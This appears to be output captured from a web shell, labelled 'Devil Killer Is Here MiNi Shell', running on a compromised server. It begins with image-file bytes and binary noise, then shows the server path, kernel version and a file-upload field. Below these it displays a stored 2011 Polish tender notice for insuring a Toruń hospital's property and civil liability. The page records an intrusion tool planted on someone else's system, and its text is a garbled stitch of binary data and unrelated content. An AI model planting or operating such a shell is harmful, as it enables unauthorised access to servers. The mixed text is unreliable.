JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/310329-N-2011.html

<p class="kh_header"><b>Toruń: Świadczenie usług w zakresie ubezpieczenie mienia i odpowiedzialności cywilnej Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu</b><br>
<b>Numer ogłoszenia: 310329 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie ubezpieczenie mienia i odpowiedzialności cywilnej Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. PRZEDMIOT I ZAKRES UBEZPIECZENIA<br>

I. UBEZPIECZENIE MIENIA OD WSZYSTKICH RYZYK<br>

1. Okres ubezpieczenia:  01.01.2012 r. -  31.12.2012 r.<br>
    
2. Miejsce ubezpieczenia: ul. Św. Józefa 53/59, 87-100 Toruń; ul. Konstytucji 3 Maja 42, 87-100 Toruń; ul. Konstytucji 3 Maja 40, 87-100 Toruń. <br>
3. Zakres ubezpieczenia: ryzyka wszystkie: ochrona ubezpieczeniowa obejmuje szkody polegające na utracie, uszkodzeniu, lub zniszczeniu ubezpieczonego mienia, będące następstwem przewidzianego w umowie zdarzenia o charakterze losowym i niepewnym, które wystąpiło nagle, nieprzewidzianie i niezależnie od woli Ubezpieczającego, jak również koszty poniesione w związku z ratowaniem przedmiotu ubezpieczenia, zapobieżeniem szkodzie (zabezpieczeniem mienia przed uszkodzeniem) lub zmniejszeniem jej rozmiarów.<br>

W granicach sumy ubezpieczenia mienia zagrożonego szkodą Zakład Ubezpieczeń zwraca Ubezpieczającemu koszty poniesione w celu ratowania przedmiotu ubezpieczenia oraz zapobieżenia szkodzie lub zmniejszenia jej rozmiarów, jeżeli środki te były celowe, chociażby okazały się bezskuteczne. Powyższe koszty są zwracane nawet jeżeli nie wystąpiła szkoda w ubezpieczonym mieniu.<br>

Ochroną ubezpieczeniową objęte są także szkody w ubezpieczonym mieniu powstałe wskutek:<br>
1) akcji gaśniczej, ratowniczej, prowadzonych w związku z wystąpieniem zdarzeń, za 
które Zakład Ubezpieczeń ponosi odpowiedzialność.<br>
2) zanieczyszczenia lub skażenia ubezpieczonego mienia w wyniku zdarzeń losowych 
objętych umową ubezpieczenia.<br>

Dodatkowo Zakład Ubezpieczeń pokrywa koszty powstałe w związku z:<br>
1) uprzątnięciem pozostałości po szkodzie, łącznie z kosztami rozbiórki, demontażu i wywozu części niezdatnych do użytku, składowaniem lub utylizacją. Powyższe koszty objęte są ochroną ubezpieczeniową do limitu odpowiedzialności wysokości 10% wartości szkody, jednak nie więcej niż 1.000.000 złotych w odniesieniu do wszystkich szkód powstałych w okresie ubezpieczenia; ochrona nie dotyczy kosztów związanych z usunięciem zanieczyszczeń wody lub gleby i jej rekultywacją<br>

2) odtworzeniem dokumentacji produkcyjnej lub zakładowej (aktów, planów, dokumentów, danych), uszkodzonej, zniszczonej lub utraconej.
Ochrona obejmuje wyłącznie koszty robocizny poniesione na takie odtworzenie dokumentacji z włączeniem przeprowadzenia niezbędnych badań i analiz oraz koszty odtworzenia nośników, na których dokumentacja była zawarta; powyższe koszty objęte są ochroną ubezpieczeniową do limitu odpowiedzialności w wysokości 5% wartości szkody, jednak nie więcej niż 50.000 złotych w odniesieniu do wszystkich szkód powstałych w okresie ubezpieczenia.<br>

4. Suma ubezpieczenia<br>
Sumy ubezpieczenia: wg wartości księgowej brutto (wartość wynikająca z ewidencji księgowej, która zgodnie z ustawą o rachunkowości odpowiada wartości początkowej mienia, z uwzględnieniem zmian wartości początkowej, bez uwzględnienia amortyzacji).
Sumy ubezpieczenia mienia określone w opisie przedmiotu zamówienia zostały ustalone na dzień 30.09.2011 r. <br>

5. Przedmiot ubezpieczenia:<br>
Przedmiot ubezpieczenia
1 Budynki (Grupa I), suma ubezpieczenia 
127.325.499,95<br>

2 Budowle (Grupa II), suma ubezpieczenia 7.331.529,37<br>

3 Środki trwałe (maszyny, aparaty, urządzenia, wyposażenie z Grup III-VIII w tym sprzęt elektroniczny i medyczny starszy niż 6 lat), suma ubezpieczenia 98.544.303,39<br>

4 Niskocenne składniki majątku, , suma ubezpieczenia 500.000,00<br>

5 Poczynione nakłady inwestycyjne, suma ubezpieczenia  4.141.021,22<br>

6 Planowane nakłady inwestycyjne, suma ubezpieczenia  41.912.786,71<br>

7 Środki obrotowe, suma ubezpieczenia 1.800.000,00<br>

8 Wartości pieniężne (gotówka poza schowkiem ogniotrwałym), suma ubezpieczenia 15.000,00<br>

9 Mienie osób trzecich (sprzęt medyczny - analizatory), suma ubezpieczenia 6.311.850,05<br>

10 Wartości pieniężne w lokalu, suma ubezpieczenia 50.000,00<br>

Pozostałe postanowienia:<br>
Dla maszyn , urządzeń i wyposażenia centrum stomatologii w. o wartości:
4.000,000 zł właścicielem i ubezpieczonym jest Wojewódzki Szpital Zespolony im. Ludwika Rydygiera w Toruniu,
18.500.000 zł właścicielem i ubezpieczonym jest Kujawsko-Pomorskie 
Inwestycje Medyczne Sp. z o.o., ul. Curie-Skłodowskiej 73/111, 87-100 Toruń

6. Franszyza<br>
Franszyza integralna: 400,00 PLN<br>
Franszyza redukcyjna: 500,00 PLN<br>
Udział własny w szkodzie: zniesiony<br>

7. Limity odpowiedzialności: dla ryzyk kradzież z włamaniem i rabunek, wandalizm i dewastacja, kradzież zwykła ustala się limity odpowiedzialności dla poszczególnych składników majątku na jedno i wszystkie zdarzenia w okresie ubezpieczenia w systemie pierwszego ryzyka - jak niżej:<br>

* kradzież z włamaniem i rabunek <br>

Środki trwałe (maszyny, aparaty, urządzenia, wyposażenie 
z Grup III-VIII w tym sprzęt elektroniczny i medyczny starszy niż 6 lat, niskocenne składniki majątku), suma ubezpieczenia 400.000,00PLN<br>

Środki obrotowe, zapasy magazynowe, suma ubezpieczenia 200.000,00 PLN<br>

Wartości pieniężne od kradzieży z włamaniem, suma ubezpieczenia 25.000,00 PLN<br>

Wartości pieniężne od rabunku w lokalu, suma ubezpieczenia 50.000,00 PLN<br>

Wartości pieniężne w transporcie na terenie RP, suma ubezpieczenia 15.000,00 PLN<br>

Mienie osób trzecich , suma ubezpieczenia 200.000,00 PLN<br>

Kradzież zwykła, suma ubezpieczenia 10.000,00 PLN<br>

Koszty naprawy zabezpieczeń, suma ubezpieczenia 5.000,00 PLN<br>

* wandalizm i dewastacja <br>
Łączny limit dla wszystkich składników mienia (budynki, budowle, środki trwałe - j/w, 
niskocenne składniki majątku, środki obrotowe), suma ubezpieczenia 100.000,00 PLN<br>

Zakres ubezpieczenia obejmujący: kradzież z włamaniem, rabunek, wandalizm, dewastację, kradzież zwykłą, koszty naprawy zabezpieczeń:<br>
a) kradzież z włamaniem - rozumianą jako zabór mienia z zamkniętego lokalu po usunięciu przy użyciu siły lub narzędzi istniejących zabezpieczeń, lub zabór mienia z lokalu w którym sprawca ukrył się przed jego zamknięciem i pozostawił ślady mogące stanowić dowód jego ukrycia,<br>

b) rabunek - zabór mienia z użyciem przemocy fizycznej lub groźby jej użycia wobec ubezpieczającego, osób działających w jego imieniu lub przez niego zatrudnionych albo po zmuszeniu przemocą fizyczną lub groźbą osoby posiadającej klucze do otwarcia lokalu albo po otwarciu lokalu kluczami zrabowanymi,<br>
c) wandalizm - rozumiany jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie, które uzyskały do niego dostęp wskutek kradzieży z włamaniem i rabunku,<br>
d) dewastację - rozumianą jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie bez względu na sposób uzyskania dostępu do zdewastowanego mienia,<br>
e) kradzież zwykłą - tj. przywłaszczenie mienia z pomieszczeń i obiektów należących do ubezpieczającego, które potwierdzone jest zeznaniami świadków a sprawca nie pozostawił śladów włamania na drzwiach i otworach okiennych, pod warunkiem, że ubezpieczający zawiadomi o tym fakcie policję, bezzwłocznie po stwierdzeniu wystąpienia szkody spowodowanej kradzieżą. Z ochrony wyłączona jest odpowiedzialność za wartości pieniężne i ich odpowiedniki,<br>
f) koszty naprawy zabezpieczeń uszkodzonych lub zniszczonych podczas zdarzenia,<br>

8. Franszyza<br>
Franszyza integralna: 400,00 PLN<br>
Franszyza redukcyjna: 500,00 PLN<br>
Udział własny w szkodzie: zniesiony<br>

II. OBOWIĄZKOWE UBEZPIECZENIE ODPOWIEDZIALNOŚCI CYWILNEJ 
     ŚWIADCZENIODAWCY UDZIELAJĄCEGO ŚWIADCZEŃ OPIEKI ZDROWOTNEJ<br>

1. Okres ubezpieczenia:  01.01.2012 r. -  31.12.2012 r.<br>
    
2. Zakres terytorialny: RP<br>

3. Zakres ubezpieczenia: ubezpieczeniem objęta jest odpowiedzialność cywilna świadczeniodawcy udzielającego świadczeń opieki zdrowotnej, za szkody wyrządzone w następstwie działania lub zaniechania ubezpieczonego, w okresie trwania ochrony ubezpieczeniowej, podczas udzielania świadczeń opieki zdrowotnej wykonywanych na podstawie umowy o udzielanie świadczeń opieki zdrowotnej, zgodnie z Rozporządzeniem Ministra Finansów z dnia 28.12.2007 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej (Dz.U. Nr 3 z 2008 r., poz. 10.).<br>

4. Suma gwarancyjna:<br>
Równowartość złotych kwoty 46.500,00 EUR na jedno zdarzenie i 275.000,00 EUR na wszystkie zdarzenia powstałe w okresie ubezpieczenia.<br>

III. DOBROWOLNE UBEZPIECZENIE ODPOWIEDZIALNOŚCI CYWILNEJ. <br>

1. Okres ubezpieczenia: 01.01.2012 r. -  31.12.2012 r.<br>

2. Zakres terytorialny: RP<br>

3. Zakres ubezpieczenia: Ubezpieczenie obejmować winno odpowiedzialność cywilną Zamawiającego za szkody wyrządzone w związku z posiadanym mieniem i prowadzoną działalnością niezwiązaną z  udzielaniem świadczeń opieki zdrowotnej (OC delikt + OC kontrakt) z rozszerzeniem o:<br>

odpowiedzialność cywilną pracodawcy do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej, odpowiedzialność cywilną za szkody w mieniu przechowywanym, kontrolowanym lub chronionym przez Ubezpieczającego  z podlimitem odpowiedzialności 50.000 zł na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej, <br>

odpowiedzialność cywilną za szkody wyrządzone przez podwykonawców i szkody wyrządzone przez Ubezpieczającego podwykonawcom do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej,<br>

szkody w nieruchomościach, z których Ubezpieczający korzysta na podstawie umowy najmu, dzierżawy, użytkowania, leasingu itp. do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej,<br>

szkody w rzeczach ruchomych, z których Ubezpieczający korzysta na podstawie umowy najmu, dzierżawy, użytkowania, użyczenia, leasingu itp. do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej,<br>

odpowiedzialność cywilną za produkt do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej,<br>

odpowiedzialność cywilną za szkody wyrządzone przez pojazdy nie podlegające obowiązkowemu ubezpieczeniu OC posiadaczy pojazdów mechanicznych (w chwili obecnej jest to 1 pojazd) do wysokości ogólnej sumy gwarancyjnej na jeden i wszystkie wypadki w okresie ubezpieczenia w ramach ogólnej sumy gwarancyjnej,<br>

Ubezpieczenie winno obejmować odpowiedzialność ubezpieczyciela za szkody (osobowe tj. powstałe wskutek śmierci, uszkodzenia ciała i rozstroju zdrowia, w tym także utracone korzyści i rzeczowe tj. powstałe wskutek utraty, zniszczenia lub uszkodzenia rzeczy, w tym także utracone korzyści) powstałe ze zdarzeń (tj. działania lub zaniechania Ubezpieczonego w wyniku którego zostaje wyrządzona szkoda) zaistniałych w okresie trwania ubezpieczenia, nawet jeżeli zostaną one zgłoszone po tym okresie, jednak przed upływem terminu przedawnienia.<br>

4. Suma gwarancyjna: 300.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia<br>

5. Udział własny w szkodzie:<br>
Udział własny w szkodzie: Brak<br>
Franszyza integralna: 50 Euro<br>


B. KLAUZULE DODATKOWE - Klauzule te nie mają zastosowania do Obowiązkowego Ubezpieczenia Odpowiedzialności Cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej oraz Dobrowolnego Ubezpieczenie Odpowiedzialności Cywilnej Zakładu Opieki Zdrowotnej.<br>

Opisany w punkcie A przedmiot i zakres ubezpieczenia zostaje rozszerzony o wymienione niżej klauzule obligatoryjne i fakultatywne:<br>
Klauzule obligatoryjne<br>
1 Klauzula reprezentantów<br>
2 Klauzula automatycznego ubezpieczenia nowego mienia<br>
3 Klauzula automatycznej ochrony dla nowych lokalizacji<br>
4 Klauzula ubezpieczenia szkód powstałych w wyniku przepięcia<br>
5 Klauzula ubezpieczenia drobnych robót budowlanych<br>
6 Klauzula ubezpieczenia szyb i innych przedmiotów szklanych od stłuczenia<br>
7 Klauzula likwidacyjna w środkach obrotowych<br>
8 Klauzula ograniczenia zasady proporcji<br>
9 Klauzula automatycznego pokrycia podmiotów zależnych<br>
10 Klauzula przewłaszczenia mienia<br>
11 Klauzula ubezpieczenia kosztów usunięcia pozostałości po szkodzie<br>
12 Klauzula ubezpieczenia kosztów akcji ratowniczej<br>
13 Klauzula ubezpieczenia kosztów zabezpieczenia mienia przed szkodą<br>
14 Klauzula ubezpieczenia szkód w towarach przechowywanych w urządzeniach chłodniczych<br>
15 Klauzula ubezpieczenia urządzeń zewnętrznych<br>
16 Klauzula ubezpieczenia przezornej sumy ubezpieczenia<br>
17 Klauzula płatności składki<br>
18 Klauzula potrącania rat<br>
19 Klauzula rozliczenia składek<br>
20 Klauzula warunków i taryf<br>
21 Klauzula zabezpieczeń przeciwpożarowych i przeciwkradzieżowych<br>
22 Klauzula zgłaszania szkód<br>
23 Klauzula niezawiadomienia w terminie o szkodzie<br>
24 Klauzula terminu dokonania oględzin<br>
25 Klauzula bezzwłocznej naprawy szkody<br>
26 Klauzula niezmienności stanu faktycznego<br>
27 Klauzula wypłaty odszkodowania z podatkiem VAT<br>
28 Klauzula 72 godzin<br>
29 Klauzula sądu polubownego<br>
30 Klauzula ubezpieczenia dewastacji i wandalizmu<br>
31 Klauzula zrzeczenia się prawa do regresu<br>
32 Klauzula ubezpieczenia nośników obrazu w urządzeniach fotokopiujących<br>
33 Klauzula ubezpieczenia lamp od wszystkich ryzyk<br>
34 Klauzula wyłączenia lamp elektronowych z zakresu ubezpieczenia<br>
35 Klauzula ubezpieczenia endoskopów oraz urządzeń do terapii dożylnej<br>

Klauzule fakultatywne<br>
36 Klauzula wynagrodzenia ekspertów<br>
37 Klauzula kosztów poszukiwania wycieku<br>
38 Klauzula katastrofy budowlanej<br>
39 Klauzula ubezpieczenia kosztów odtworzenia dokumentacji<br>
40 Klauzula wypłaty zaliczki<br>

C. WARUNKI DODATKOWE<br>

1. Przedmiot ubezpieczenia stanowi majątek trwały i obrotowy będący własnością Wojewódzkiego Szpitala Zespolonego w Toruniu wraz z mieniem, który wstąpił we wszystkie stosunki prawne, których przedmiotem był  Wojewódzki Szpital Dziecięcy w Toruniu, Zespół Poradni Specjalistycznych Dziecięcych oraz Samodzielne Wojewódzkie Centrum Stomatologii w Toruniu oraz mienie powierzone, użyczone i użytkowane na podstawie odrębnych umów wg stanu na dzień 30.09.2011 r. <br>

2. Płatność składki za ubezpieczenia majątkowe będzie dokonywana w dwunastu równych ratach.<br>

3. Składki za doubezpieczane mienie w trakcie trwania umowy liczone będą zgodnie z zasadą pro rata temporis za każdy dzień udzielanej ochrony oraz bez stosowania stawek minimalnych wynikających z zasady określającej minimalną składkę ubezpieczeniową dla każdej wystawionej polisy. <br>

4. W przypadku sprzedaży lub likwidacji części majątku w trakcie trwania niniejszej umowy Wykonawca po otrzymaniu pisemnej informacji od Zamawiającego dokona zwrotu składki za niewykorzystany okres ubezpieczenia, obliczonego zgodnie z zasadą pro rata temporis za każdy dzień udzielanej ochrony bez potrącania kosztów manipulacyjnych.<br>

5. Zamawiający umożliwia Wykonawcy zapoznanie się ze stanem przedmiotu zamówienia, w tym zapoznania się z zabezpieczeniami występującymi w obiektach Zamawiającego. Zaleca się, aby Wykonawca uzyskał wszelkie informacje, które mogą być konieczne do przygotowania oferty. Jeśli Wykonawca po zapoznaniu się ze stanem przedmiotu zamówienia złoży ofertę i przystąpi do przetargu uważa się, że zapoznał się i zaakceptował jego stan.<br>

6. Obsługa umów ubezpieczenia wykonywana będzie przez brokera ubezpieczeniowego: EUROBROKERS Sp. z o.o. z siedzibą w Bydgoszczy przy ul. A. Czartoryskiego 13, reprezentującego Zamawiającego w kontaktach z Wykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielenia w okresie trwania umowy 	zamówień uzupełniających (z wyłączeniem ubezpieczenia OC  Obowiązkowego oraz OC Dobrowolnego). Zamówienia uzupełniające udzielane będą w trybie zamówienia z wolnej ręki, po spełnieniu przesłanek z art. 67 ust.1 pkt. 6 ustawy Pzp.<br>
2. Zamówienia uzupełniające stanowić będą łącznie nie więcej niż 50% wartości zamówienia podstawowego i będą polegały na powtórzeniu tego 	samego rodzaju zamówienia określonego w specyfikacji istotnych warunków zamówienia<br>
3. Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do przyjęcia zamówienia oraz zastosowania w zamówieniach uzupełniających stawek nie wyższych niż zastosowanych w zamówieniu podstawowym oraz bez stosowania stawek minimalnych wynikających z zasady określającej minimalną składkę ubezpieczeniową dla każdej wystawionej polisy.<br>
4. Konieczność udzielania zamówień uzupełniających jest związana z 		możliwością:<br>
- zwiększania się w okresie ubezpieczenia wartości majątku poprzez nabycie nowych składników majątkowych, inwestycje w posiadane składniki majątkowe, wyceny majątku lub przeszacowania wartości majątku,<br>
- konieczności zawarcia ubezpieczeń wynikających z umów z kontrahentami Zamawiającego w zakresie ubezpieczenia mienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.52.00-5, 66.51.50.00-3, 66.51.60.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania uprawnień  do wykonywania określonej działalności lub czynności za spełniony jeżeli Wykonawca posiada uprawnienia do wykonywania działalności objętej przedmiotem zamówienia,
w szczególności posiada  zezwolenie na prowadzenie działalności gospodarczej w zakresie ubezpieczeń zgodnie z przepisami ustawy z dnia 22 maja 2003 r. o działalności ubezpieczeniowej (Dz. U. z 2010 r. Nr 11, poz. 60 z późn. zm.). W celu potwierdzenia powyższego Wykonawca złoży:<br>
a/ Zezwolenie na prowadzenie działalności gospodarczej w zakresie ubezpieczeń zgodnie z przepisami ustawy z dnia 22 maja 2003 r. o działalności ubezpieczeniowej (Dz. U. z 2010 r. Nr 11, poz. 60 z późn. zm.). (W przypadku oferty składanej wspólnie, każdy Wykonawca składa wyżej wymieniony dokument odrębnie).<br>
b/oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik Nr 4 do SIWZ (w przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik Nr 4 do SIWZ. (w przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik Nr 4 do SIWZ. (w przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik Nr 4 do SIWZ. (w przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
